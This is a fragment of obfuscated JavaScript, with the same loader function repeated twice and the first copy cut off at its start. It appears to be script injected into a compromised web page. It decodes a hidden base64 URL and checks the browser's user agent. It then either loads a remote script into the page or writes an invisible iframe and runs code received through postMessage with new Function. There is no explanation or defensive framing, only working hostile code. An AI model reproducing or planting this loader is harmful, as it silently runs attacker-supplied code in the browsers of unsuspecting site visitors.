^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }hHqRgXFJ1866();
function feduaCqt4893(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"TWhKcy9xLT"+"E4NzU4LUEt"+"MTM2Lw=="; var r='BQKnpmeo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }feduaCqt4893();